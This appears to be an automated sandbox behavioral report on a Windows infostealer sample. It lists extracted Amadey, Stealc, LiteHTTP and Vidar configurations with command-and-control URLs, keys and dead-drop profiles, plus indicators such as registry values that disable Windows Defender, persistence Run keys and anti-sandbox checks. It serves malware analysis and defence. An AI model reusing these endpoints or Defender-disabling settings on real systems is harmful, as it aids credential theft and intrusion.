Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 18:03
Static task
static1
Behavioral task
behavioral1
Sample
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
Resource
win10v2004-20250217-en
General
-
Target
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
-
Size
1.8MB
-
MD5
44432f95b130ce27ffe942af9562c738
-
SHA1
8d44dd529c59881f2e728593b373f2eff42be305
-
SHA256
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca
-
SHA512
48c8b0f3d62a8d81129129e80bd432d949a644023a88568fb1aa5fce8c6731f70c5282bc981ad68cfd3eb1fc5ef3ac380dd29b2daf8577c265a24c6140481ff0
-
SSDEEP
24576:mbsa4Csaaeb3mSAIfnn8SUFrUL299r2qoCwYl2Rg6atG4pk8H1w4I7HhrYFAOOtw:WQmhnc9rr2RxalblILoAVbuAjJ4
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 16 IoCs
resource yara_rule behavioral2/memory/2332-748-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-750-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2484-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2566-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2579-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2660-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2671-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2781-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2831-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2884-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-2901-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-3031-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-3831-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-3948-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-3947-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2332-3949-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5756-659-0x0000000000B50000-0x0000000000F98000-memory.dmp healer behavioral2/memory/5756-660-0x0000000000B50000-0x0000000000F98000-memory.dmp healer behavioral2/memory/5756-761-0x0000000000B50000-0x0000000000F98000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 15ad30e5a6.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 15ad30e5a6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 15ad30e5a6.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 15ad30e5a6.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 15ad30e5a6.exe -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfe8f775d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 770fd64b77.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fa9cd2f57c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2085eb7ce3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e11988fb68.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ LAHU5YGKPHULSVA2AGH.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 15ad30e5a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 36430e85bc.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3340 powershell.exe 6868 powershell.exe 3720 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3012 bitsadmin.exe -
Downloads MZ/PE file 10 IoCs
flow pid Process 116 4808 fa9cd2f57c.exe 28 4944 rapes.exe 28 4944 rapes.exe 28 4944 rapes.exe 28 4944 rapes.exe 28 4944 rapes.exe 43 4296 BitLockerToGo.exe 88 1840 BitLockerToGo.exe 389 4944 rapes.exe 389 4944 rapes.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6056 chrome.exe 6876 chrome.exe 4628 msedge.exe 4896 chrome.exe 6376 msedge.exe 6980 msedge.exe 6816 msedge.exe 1708 msedge.exe 5596 chrome.exe 5580 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000e000000023b71-734.dat net_reactor behavioral2/memory/5660-744-0x0000000000180000-0x00000000001E0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfe8f775d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e11988fb68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fa9cd2f57c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2085eb7ce3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 15ad30e5a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 36430e85bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 770fd64b77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fa9cd2f57c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LAHU5YGKPHULSVA2AGH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfe8f775d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 36430e85bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e11988fb68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 770fd64b77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2085eb7ce3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LAHU5YGKPHULSVA2AGH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 15ad30e5a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mAtJWNv.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CDQ_Docker.lnk cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CDQ_Docker.lnk cmd.exe -
Executes dropped EXE 32 IoCs
pid Process 4944 rapes.exe 316 36430e85bc.exe 4808 fd3d5b1ed1.exe 4796 fd3d5b1ed1.exe 3444 dfe8f775d3.exe 2764 e11988fb68.exe 2864 770fd64b77.exe 4808 fa9cd2f57c.exe 4472 2085eb7ce3.exe 4272 rapes.exe 2216 90063aaeb3.exe 4116 LAHU5YGKPHULSVA2AGH.exe 5756 15ad30e5a6.exe 5272 ce4pMzk.exe 5660 mAtJWNv.exe 4116 mAtJWNv.exe 5752 mAtJWNv.exe 2332 mAtJWNv.exe 3224 SvhQA35.exe 5552 chromium.exe 1208 FvbuInU.exe 5792 Ps7WqSx.exe 6088 zY9sqWs.exe 6208 Y87Oyyz.exe 6272 Y87Oyyz.exe 1272 SplashWin.exe 6124 SplashWin.exe 6140 rapes.exe 6548 MCxU5Fj.exe 7064 MCxU5Fj.exe 6128 OEHBOHk.exe 5496 v6Oqdnc.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine LAHU5YGKPHULSVA2AGH.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine dfe8f775d3.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 2085eb7ce3.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 15ad30e5a6.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 36430e85bc.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine e11988fb68.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 770fd64b77.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine fa9cd2f57c.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe -
Loads dropped DLL 54 IoCs
pid Process 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 5552 chromium.exe 6272 Y87Oyyz.exe 1272 SplashWin.exe 1272 SplashWin.exe 1272 SplashWin.exe 6124 SplashWin.exe 6124 SplashWin.exe 6124 SplashWin.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 15ad30e5a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 15ad30e5a6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\90063aaeb3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105400101\\90063aaeb3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\15ad30e5a6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105410101\\15ad30e5a6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\7IVC84L3\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fa9cd2f57c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105380101\\fa9cd2f57c.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2085eb7ce3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105390101\\2085eb7ce3.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 6724 powercfg.exe 6136 powercfg.exe 5892 powercfg.exe 6880 powercfg.exe 4276 powercfg.exe 4516 powercfg.exe 6716 powercfg.exe 6244 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023d03-280.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 4944 rapes.exe 316 36430e85bc.exe 3444 dfe8f775d3.exe 2764 e11988fb68.exe 2864 770fd64b77.exe 4808 fa9cd2f57c.exe 4472 2085eb7ce3.exe 4272 rapes.exe 4116 LAHU5YGKPHULSVA2AGH.exe 5756 15ad30e5a6.exe 1208 FvbuInU.exe 6140 rapes.exe 5496 v6Oqdnc.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4808 set thread context of 4796 4808 fd3d5b1ed1.exe 97 PID 316 set thread context of 4296 316 36430e85bc.exe 101 PID 3444 set thread context of 1840 3444 dfe8f775d3.exe 109 PID 5660 set thread context of 2332 5660 mAtJWNv.exe 149 PID 6124 set thread context of 5124 6124 SplashWin.exe 197 PID 6548 set thread context of 7064 6548 MCxU5Fj.exe 203 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5308 sc.exe 6712 sc.exe 1800 sc.exe 5412 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4488 4808 WerFault.exe 96 5268 5660 WerFault.exe 146 7160 6548 WerFault.exe 202 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LAHU5YGKPHULSVA2AGH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 90063aaeb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36430e85bc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd3d5b1ed1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfe8f775d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd3d5b1ed1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 15ad30e5a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 90063aaeb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fa9cd2f57c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2085eb7ce3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e11988fb68.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 770fd64b77.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90063aaeb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3304 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 1444 taskkill.exe 2764 taskkill.exe 5108 taskkill.exe 4968 taskkill.exe 1760 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856715514750516" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings rapes.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
